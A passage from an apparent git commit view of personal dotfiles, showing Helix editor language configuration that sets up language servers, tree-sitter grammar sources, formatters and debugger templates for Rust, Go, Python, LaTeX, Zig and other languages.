name = "json"
|
||||||
|
language-servers = ["vscode-json-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yaml"
|
||||||
|
language-servers = ["yaml-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "html"
|
||||||
|
language-servers = ["vscode-html-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "css"
|
||||||
|
language-servers = ["vscode-css-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "go"
|
||||||
|
language-servers = ["gopls"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "rust"
|
||||||
|
language-servers = ["rust-analyzer"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "zig"
|
||||||
|
language-servers = ["zls"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "powershell"
|
||||||
|
language-servers = ["powershell-editor-services"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "latex"
|
||||||
|
scope = "source.tex"
|
||||||
|
file-types = ["tex", "sty", "cls", "dtx"]
|
||||||
|
roots = ["main.tex", ".latexmkrc", "body-osr.md"]
|
||||||
|
comment-token = "%"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = ["texlab"]
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
'`' = "'"
|
||||||
|
'$' = '$'
|
||||||
960
helix/.config/helix/languages.toml.bak
Normal file
960
helix/.config/helix/languages.toml.bak
Normal file
|
|
@ -0,0 +1,960 @@
|
||||||
|
# Language support configuration.
|
||||||
|
# See the languages documentation: https://docs.helix-editor.com/master/languages.html
|
||||||
|
|
||||||
|
use-grammars = { except = [ "wren", "gemini" ] }
|
||||||
|
|
||||||
|
[language-server]
|
||||||
|
|
||||||
|
awk-language-server = { command = "awk-language-server" }
|
||||||
|
bash-language-server = { command = "bash-language-server", args = ["start"] }
|
||||||
|
csharp-ls = { command = "csharp-ls" }
|
||||||
|
docker-langserver = { command = "docker-langserver", args = ["--stdio"] }
|
||||||
|
docker-compose-langserver = { command = "docker-compose-langserver", args = ["--stdio"]}
|
||||||
|
jedi = { command = "jedi-language-server" }
|
||||||
|
ltex-ls = { command = "ltex-ls" }
|
||||||
|
ltex-ls-plus = { command = "ltex-ls-plus" }
|
||||||
|
markdoc-ls = { command = "markdoc-ls", args = ["--stdio"] }
|
||||||
|
markdown-oxide = { command = "markdown-oxide" }
|
||||||
|
marksman = { command = "marksman", args = ["server"] }
|
||||||
|
pylsp = { command = "pylsp" }
|
||||||
|
pyright = { command = "pyright-langserver", args = ["--stdio"], config = {} }
|
||||||
|
pylyzer = { command = "pylyzer", args = ["--server"] }
|
||||||
|
tailwindcss-ls = { command = "tailwindcss-language-server", args = ["--stdio"] }
|
||||||
|
texlab = { command = "texlab" }
|
||||||
|
vscode-css-language-server = { command = "vscode-css-language-server", args = ["--stdio"], config = { provideFormatter = true, css = { validate = { enable = true } } } }
|
||||||
|
vscode-html-language-server = { command = "vscode-html-language-server", args = ["--stdio"], config = { provideFormatter = true } }
|
||||||
|
vscode-json-language-server = { command = "vscode-json-language-server", args = ["--stdio"], config = { provideFormatter = true, json = { validate = { enable = true } } } }
|
||||||
|
yaml-language-server = { command = "yaml-language-server", args = ["--stdio"] }
|
||||||
|
|
||||||
|
[language-server.lua-language-server]
|
||||||
|
command = "lua-language-server"
|
||||||
|
|
||||||
|
[language-server.lua-language-server.config.Lua.hint]
|
||||||
|
enable = true
|
||||||
|
arrayIndex = "Enable"
|
||||||
|
setType = true
|
||||||
|
paramName = "All"
|
||||||
|
paramType = true
|
||||||
|
await = true
|
||||||
|
|
||||||
|
|
||||||
|
[language-server.gopls]
|
||||||
|
command = "gopls"
|
||||||
|
|
||||||
|
[language-server.gopls.config.hints]
|
||||||
|
assignVariableTypes = true
|
||||||
|
compositeLiteralFields = true
|
||||||
|
constantValues = true
|
||||||
|
functionTypeParameters = true
|
||||||
|
parameterNames = true
|
||||||
|
rangeVariableTypes = true
|
||||||
|
|
||||||
|
[language-server.golangci-lint-lsp]
|
||||||
|
command = "golangci-lint-langserver"
|
||||||
|
|
||||||
|
[language-server.golangci-lint-lsp.config]
|
||||||
|
command = ["golangci-lint", "run", "--output.json.path=stdout", "--show-stats=false", "--issues-exit-code=1"]
|
||||||
|
|
||||||
|
[language-server.rust-analyzer]
|
||||||
|
command = "rust-analyzer"
|
||||||
|
|
||||||
|
[language-server.rust-analyzer.config]
|
||||||
|
inlayHints.bindingModeHints.enable = false
|
||||||
|
inlayHints.closingBraceHints.minLines = 10
|
||||||
|
inlayHints.closureReturnTypeHints.enable = "with_block"
|
||||||
|
inlayHints.discriminantHints.enable = "fieldless"
|
||||||
|
inlayHints.lifetimeElisionHints.enable = "skip_trivial"
|
||||||
|
inlayHints.typeHints.hideClosureInitialization = false
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "rust"
|
||||||
|
scope = "source.rust"
|
||||||
|
injection-regex = "rs|rust"
|
||||||
|
file-types = ["rs"]
|
||||||
|
roots = ["Cargo.toml", "Cargo.lock"]
|
||||||
|
shebangs = ["rust-script", "cargo"]
|
||||||
|
auto-format = true
|
||||||
|
comment-tokens = ["//", "///", "//!"]
|
||||||
|
block-comment-tokens = [
|
||||||
|
{ start = "/*", end = "*/" },
|
||||||
|
{ start = "/**", end = "*/" },
|
||||||
|
{ start = "/*!", end = "*/" },
|
||||||
|
]
|
||||||
|
language-servers = [ "rust-analyzer" ]
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
persistent-diagnostic-sources = ["rustc", "clippy"]
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
'`' = '`'
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "rust"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-rust", rev = "1f63b33efee17e833e0ea29266dd3d713e27e321" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "toml"
|
||||||
|
scope = "source.toml"
|
||||||
|
injection-regex = "toml"
|
||||||
|
file-types = ["toml", { glob = "pdm.lock" }, { glob = "poetry.lock" }, { glob = "Cargo.lock" }, { glob = "uv.lock" }]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "taplo" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "toml"
|
||||||
|
source = { git = "https://github.com/ikatyang/tree-sitter-toml", rev = "7cff70bbcbbc62001b465603ca1ea88edd668704" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "awk"
|
||||||
|
scope = "source.awk"
|
||||||
|
injection-regex = "awk"
|
||||||
|
file-types = ["awk", "gawk", "nawk", "mawk"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "awk-language-server" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "awk"
|
||||||
|
source = { git = "https://github.com/Beaglefoot/tree-sitter-awk", rev = "a799bc5da7c2a84bc9a06ba5f3540cf1191e4ee3" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "json"
|
||||||
|
scope = "source.json"
|
||||||
|
injection-regex = "json"
|
||||||
|
file-types = [
|
||||||
|
"json",
|
||||||
|
"arb",
|
||||||
|
"ipynb",
|
||||||
|
"geojson",
|
||||||
|
"gltf",
|
||||||
|
"webmanifest",
|
||||||
|
{ glob = "flake.lock" },
|
||||||
|
{ glob = ".babelrc" },
|
||||||
|
{ glob = ".bowerrc" },
|
||||||
|
{ glob = ".jscrc" },
|
||||||
|
"js.map",
|
||||||
|
"ts.map",
|
||||||
|
"css.map",
|
||||||
|
{ glob = ".jslintrc" },
|
||||||
|
"jsonl",
|
||||||
|
"jsonld",
|
||||||
|
{ glob = ".vuerc" },
|
||||||
|
{ glob = "composer.lock" },
|
||||||
|
{ glob = ".watchmanconfig" },
|
||||||
|
"avsc",
|
||||||
|
"ldtk",
|
||||||
|
"ldtkl",
|
||||||
|
{ glob = ".swift-format" },
|
||||||
|
"sublime-build",
|
||||||
|
"sublime-color-scheme",
|
||||||
|
"sublime-commands",
|
||||||
|
"sublime-completions",
|
||||||
|
"sublime-keymap",
|
||||||
|
"sublime-macro",
|
||||||
|
"sublime-menu",
|
||||||
|
"sublime-mousemap",
|
||||||
|
"sublime-project",
|
||||||
|
"sublime-settings",
|
||||||
|
"sublime-theme",
|
||||||
|
"sublime-workspace"
|
||||||
|
]
|
||||||
|
language-servers = [ "vscode-json-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "json"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-json", rev = "73076754005a460947cafe8e03a8cf5fa4fa2938" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "jsonc"
|
||||||
|
scope = "source.json"
|
||||||
|
injection-regex = "jsonc"
|
||||||
|
file-types = ["jsonc", { glob = "tsconfig.json" }, { glob = "bun.lock" }]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
grammar = "json"
|
||||||
|
language-servers = [ "vscode-json-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "json5"
|
||||||
|
scope = "source.json5"
|
||||||
|
injection-regex = "json5"
|
||||||
|
file-types = ["json5"]
|
||||||
|
language-servers = []
|
||||||
|
comment-token = "//"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
# https://json5.org
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "json5"
|
||||||
|
source = { git = "https://github.com/Joakker/tree-sitter-json5", rev = "c23f7a9b1ee7d45f516496b1e0e4be067264fa0d" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "c-sharp"
|
||||||
|
scope = "source.csharp"
|
||||||
|
injection-regex = "c-?sharp"
|
||||||
|
file-types = ["cs", "csx", "cake"]
|
||||||
|
roots = ["sln", "csproj"]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
language-servers = [ "omnisharp" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "c-sharp"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-c-sharp", rev = "b5eb5742f6a7e9438bee22ce8026d6b927be2cd7" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "go"
|
||||||
|
scope = "source.go"
|
||||||
|
injection-regex = "go"
|
||||||
|
file-types = ["go"]
|
||||||
|
roots = ["go.work", "go.mod"]
|
||||||
|
auto-format = true
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "gopls", "golangci-lint-lsp" ]
|
||||||
|
# TODO: gopls needs utf-8 offsets?
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "go"
|
||||||
|
transport = "tcp"
|
||||||
|
command = "dlv"
|
||||||
|
args = ["dap"]
|
||||||
|
port-arg = "-l 127.0.0.1:{}"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "css"
|
||||||
|
scope = "source.css"
|
||||||
|
injection-regex = "css"
|
||||||
|
file-types = ["css"]
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "vscode-css-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "css"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-css", rev = "769203d0f9abe1a9a691ac2b9fe4bb4397a73c51" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "scss"
|
||||||
|
scope = "source.scss"
|
||||||
|
injection-regex = "scss"
|
||||||
|
file-types = ["scss"]
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "vscode-css-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "scss"
|
||||||
|
source = { git = "https://github.com/serenadeai/tree-sitter-scss", rev = "c478c6868648eff49eb04a4df90d703dc45b312a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "html"
|
||||||
|
scope = "text.html.basic"
|
||||||
|
injection-regex = "html"
|
||||||
|
file-types = ["html", "htm", "shtml", "xhtml", "xht", "jsp", "asp", "aspx", "jshtm", "volt", "rhtml", "cshtml"]
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
language-servers = [ "vscode-html-language-server", "superhtml" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "html"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-html", rev = "29f53d8f4f2335e61bf6418ab8958dac3282077a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "python"
|
||||||
|
scope = "source.python"
|
||||||
|
injection-regex = "py(thon)?"
|
||||||
|
file-types = ["py", "pyi", "py3", "pyw", "ptl", "rpy", "cpy", "ipy", "pyt", { glob = ".python_history" }, { glob = ".pythonstartup" }, { glob = ".pythonrc" }, { glob = "*SConstruct" }, { glob = "*SConscript" }, { glob = "*sconstruct" }]
|
||||||
|
shebangs = ["python", "uv"]
|
||||||
|
roots = ["pyproject.toml", "setup.py", "poetry.lock", "pyrightconfig.json"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = ["ruff", "jedi", "pylsp"]
|
||||||
|
# TODO: pyls needs utf-8 offsets
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "python"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-python", rev = "4bfdd9033a2225cc95032ce77066b7aeca9e2efc" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bash"
|
||||||
|
scope = "source.bash"
|
||||||
|
injection-regex = "(shell|bash|zsh|sh)"
|
||||||
|
file-types = [
|
||||||
|
"sh",
|
||||||
|
"bash",
|
||||||
|
"ash",
|
||||||
|
"dash",
|
||||||
|
"ksh",
|
||||||
|
"mksh",
|
||||||
|
"zsh",
|
||||||
|
"zshenv",
|
||||||
|
"zlogin",
|
||||||
|
"zlogout",
|
||||||
|
"zprofile",
|
||||||
|
"zshrc",
|
||||||
|
"eclass",
|
||||||
|
"ebuild",
|
||||||
|
"bazelrc",
|
||||||
|
"Renviron",
|
||||||
|
"zsh-theme",
|
||||||
|
"cshrc",
|
||||||
|
"tcshrc",
|
||||||
|
"bashrc_Apple_Terminal",
|
||||||
|
"zshrc_Apple_Terminal",
|
||||||
|
{ glob = "i3/config" },
|
||||||
|
{ glob = "sway/config" },
|
||||||
|
{ glob = "tmux.conf" },
|
||||||
|
{ glob = ".bash_history" },
|
||||||
|
{ glob = ".bash_login" },
|
||||||
|
{ glob = ".bash_logout" },
|
||||||
|
{ glob = ".bash_profile" },
|
||||||
|
{ glob = ".bashrc" },
|
||||||
|
{ glob = ".profile" },
|
||||||
|
{ glob = ".zshenv" },
|
||||||
|
{ glob = ".zlogin" },
|
||||||
|
{ glob = ".zlogout" },
|
||||||
|
{ glob = ".zprofile" },
|
||||||
|
{ glob = ".zshrc" },
|
||||||
|
{ glob = ".zimrc" },
|
||||||
|
{ glob = "APKBUILD" },
|
||||||
|
{ glob = ".bash_aliases" },
|
||||||
|
{ glob = ".Renviron" },
|
||||||
|
{ glob = ".xprofile" },
|
||||||
|
{ glob = ".xsession" },
|
||||||
|
{ glob = ".xsessionrc" },
|
||||||
|
{ glob = ".yashrc" },
|
||||||
|
{ glob = ".yash_profile" },
|
||||||
|
{ glob = ".hushlogin" },
|
||||||
|
]
|
||||||
|
shebangs = ["sh", "bash", "dash", "zsh"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "bash-language-server" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "bash"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-bash", rev = "f8fb3274f72a30896075585b32b0c54cad65c086" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "latex"
|
||||||
|
scope = "source.tex"
|
||||||
|
injection-regex = "tex"
|
||||||
|
file-types = ["tex", "sty", "cls", "Rd", "bbx", "cbx"]
|
||||||
|
comment-token = "%"
|
||||||
|
language-servers = [ "texlab" ]
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "latex"
|
||||||
|
source = { git = "https://github.com/latex-lsp/tree-sitter-latex", rev = "8c75e93cd08ccb7ce1ccab22c1fbd6360e3bcea6" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bibtex"
|
||||||
|
scope = "source.bib"
|
||||||
|
injection-regex = "bib"
|
||||||
|
file-types = ["bib"]
|
||||||
|
comment-token = "%"
|
||||||
|
language-servers = [ "texlab" ]
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
auto-format = true
|
||||||
|
|
||||||
|
[language.formatter]
|
||||||
|
command = 'bibtex-tidy'
|
||||||
|
args = [
|
||||||
|
"-",
|
||||||
|
"--curly",
|
||||||
|
"--drop-all-caps",
|
||||||
|
"--remove-empty-fields",
|
||||||
|
"--sort-fields",
|
||||||
|
"--sort=year,author,id",
|
||||||
|
"--strip-enclosing-braces",
|
||||||
|
"--trailing-commas",
|
||||||
|
]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "bibtex"
|
||||||
|
source = { git = "https://github.com/latex-lsp/tree-sitter-bibtex", rev = "ccfd77db0ed799b6c22c214fe9d2937f47bc8b34" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "lua"
|
||||||
|
injection-regex = "lua"
|
||||||
|
scope = "source.lua"
|
||||||
|
file-types = ["lua", "rockspec"]
|
||||||
|
shebangs = ["lua", "luajit"]
|
||||||
|
roots = [".luarc.json", ".luacheckrc", ".stylua.toml", "selene.toml", ".git"]
|
||||||
|
comment-token = "--"
|
||||||
|
block-comment-tokens = { start = "--[[", end = "--]]" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "lua-language-server" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "lua"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-lua", rev = "88e446476a1e97a8724dff7a23e2d709855077f2" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yaml"
|
||||||
|
scope = "source.yaml"
|
||||||
|
file-types = [
|
||||||
|
"yml",
|
||||||
|
"yaml",
|
||||||
|
{ glob = ".prettierrc" },
|
||||||
|
{ glob = ".clangd" },
|
||||||
|
{ glob = ".clang-format" },
|
||||||
|
{ glob = ".clang-tidy" },
|
||||||
|
"sublime-syntax"
|
||||||
|
]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "yaml-language-server", "ansible-language-server" ]
|
||||||
|
injection-regex = "yml|yaml"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "yaml"
|
||||||
|
source = { git = "https://github.com/ikatyang/tree-sitter-yaml", rev = "0e36bed171768908f331ff7dff9d956bae016efb" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "zig"
|
||||||
|
scope = "source.zig"
|
||||||
|
injection-regex = "zig"
|
||||||
|
file-types = ["zig", "zon"]
|
||||||
|
roots = ["build.zig"]
|
||||||
|
auto-format = true
|
||||||
|
comment-tokens = ["//", "///", "//!"]
|
||||||
|
language-servers = [ "zls" ]
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
formatter = { command = "zig" , args = ["fmt", "--stdin"] }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "lldb-dap"
|
||||||
|
transport = "stdio"
|
||||||
|
command = "lldb-dap"
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "binary"
|
||||||
|
request = "launch"
|
||||||
|
completion = [ { name = "binary", completion = "filename" } ]
|
||||||
|
args = { console = "internalConsole", program = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ "pid" ]
|
||||||
|
args = { console = "internalConsole", pid = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "gdbserver attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ { name = "lldb connect url", default = "connect://localhost:3333" }, { name = "file", completion = "filename" }, "pid" ]
|
||||||
|
args = { console = "internalConsole", attachCommands = [ "platform select remote-gdb-server", "platform connect {0}", "file {1}", "attach {2}" ] }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "zig"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-zig", rev = "eb7d58c2dc4fbeea4745019dee8df013034ae66b" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown"
|
||||||
|
scope = "source.md"
|
||||||
|
injection-regex = "md|markdown"
|
||||||
|
file-types = ["md", "livemd", "markdown", "mdx", "mkd", "mkdn", "mdwn", "mdown", "markdn", "mdtxt", "mdtext", "workbook", { glob = "PULLREQ_EDITMSG" }]
|
||||||
|
roots = [".marksman.toml"]
|
||||||
|
language-servers = [ "marksman", "markdown-oxide" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdown"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-markdown", rev = "62516e8c78380e3b51d5b55727995d2c511436d8", subpath = "tree-sitter-markdown" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown.inline"
|
||||||
|
scope = "source.markdown.inline"
|
||||||
|
injection-regex = "markdown\\.inline"
|
||||||
|
file-types = []
|
||||||
|
grammar = "markdown_inline"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdown_inline"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-markdown", rev = "62516e8c78380e3b51d5b55727995d2c511436d8", subpath = "tree-sitter-markdown-inline" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "dockerfile"
|
||||||
|
scope = "source.dockerfile"
|
||||||
|
injection-regex = "docker|dockerfile"
|
||||||
|
roots = ["Dockerfile", "Containerfile"]
|
||||||
|
file-types = [
|
||||||
|
"Dockerfile",
|
||||||
|
{ glob = "Dockerfile" },
|
||||||
|
{ glob = "Dockerfile.*" },
|
||||||
|
"dockerfile",
|
||||||
|
{ glob = "dockerfile" },
|
||||||
|
{ glob = "dockerfile.*" },
|
||||||
|
"Containerfile",
|
||||||
|
{ glob = "Containerfile" },
|
||||||
|
{ glob = "Containerfile.*" },
|
||||||
|
"containerfile",
|
||||||
|
{ glob = "containerfile" },
|
||||||
|
{ glob = "containerfile.*" },
|
||||||
|
]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "docker-langserver" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "dockerfile"
|
||||||
|
source = { git = "https://github.com/camdencheek/tree-sitter-dockerfile", rev = "087daa20438a6cc01fa5e6fe6906d77c869d19fe" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "docker-compose"
|
||||||
|
scope = "source.yaml.docker-compose"
|
||||||
|
roots = ["docker-compose.yaml", "docker-compose.yml"]
|
||||||
|
language-servers = [ "docker-compose-langserver", "yaml-language-server" ]
|
||||||
|
file-types = [{ glob = "docker-compose.yaml" }, { glob = "docker-compose.yml" }]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
grammar = "yaml"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-commit"
|
||||||
|
scope = "git.commitmsg"
|
||||||
|
file-types = [{ glob = "COMMIT_EDITMSG" }, { glob = "MERGE_MSG" }]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
rulers = [51, 73]
|
||||||
|
text-width = 72
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-commit"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-commit", rev = "6f193a66e9aa872760823dff020960c6cedc37b3" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "diff"
|
||||||
|
scope = "source.diff"
|
||||||
|
file-types = ["diff", "patch", "rej"]
|
||||||
|
injection-regex = "diff"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "diff"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-diff", rev = "fd74c78fa88a20085dbc7bbeaba066f4d1692b63" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-rebase"
|
||||||
|
scope = "source.gitrebase"
|
||||||
|
file-types = [{ glob = "git-rebase-todo" }]
|
||||||
|
injection-regex = "git-rebase"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-rebase"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-rebase", rev = "d8a4207ebbc47bd78bacdf48f883db58283f9fd8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "regex"
|
||||||
|
scope = "source.regex"
|
||||||
|
injection-regex = "regex"
|
||||||
|
file-types = ["regex", { glob = ".Rbuildignore" }]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "regex"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-regex", rev = "e1cfca3c79896ff79842f057ea13e529b66af636" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-config"
|
||||||
|
scope = "source.gitconfig"
|
||||||
|
file-types = ["gitconfig", { glob = ".gitmodules" }, { glob = ".gitconfig" }, { glob = ".git/config" }, { glob = ".config/git/config" }]
|
||||||
|
injection-regex = "git-config"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-config"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-config", rev = "9c2a1b7894e6d9eedfe99805b829b4ecd871375e" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-attributes"
|
||||||
|
scope = "source.gitattributes"
|
||||||
|
file-types = [{ glob = ".gitattributes" }]
|
||||||
|
injection-regex = "git-attributes"
|
||||||
|
comment-token = "#"
|
||||||
|
grammar = "gitattributes"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "gitattributes"
|
||||||
|
source = { git = "https://github.com/mtoohey31/tree-sitter-gitattributes", rev = "3dd50808e3096f93dccd5e9dc7dc3dba2eb12dc4" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-ignore"
|
||||||
|
scope = "source.gitignore"
|
||||||
|
file-types = [{ glob = ".gitignore_global" }, { glob = "git/ignore" }, { glob = ".ignore" }, { glob = "CODEOWNERS" }, { glob = ".config/helix/ignore" }, { glob = ".helix/ignore" }, { glob = ".*ignore" }]
|
||||||
|
injection-regex = "git-ignore"
|
||||||
|
comment-token = "#"
|
||||||
|
grammar = "gitignore"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "gitignore"
|
||||||
|
source = { git = "https://github.com/shunsambongi/tree-sitter-gitignore", rev = "f4685bf11ac466dd278449bcfe5fd014e94aa504" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "graphql"
|
||||||
|
scope = "source.graphql"
|
||||||
|
injection-regex = "graphql"
|
||||||
|
file-types = ["gql", "graphql", "graphqls"]
|
||||||
|
language-servers = [ "graphql-language-service" ]
|
||||||
|
comment-token = "#"
|
||||||
|
block-comment-tokens = { start = "\"\"\"", end = "\"\"\"" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "solidity"
|
||||||
|
scope = "source.sol"
|
||||||
|
injection-regex = "(sol|solidity)"
|
||||||
|
file-types = ["sol"]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
language-servers = [ "solc" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "solidity"
|
||||||
|
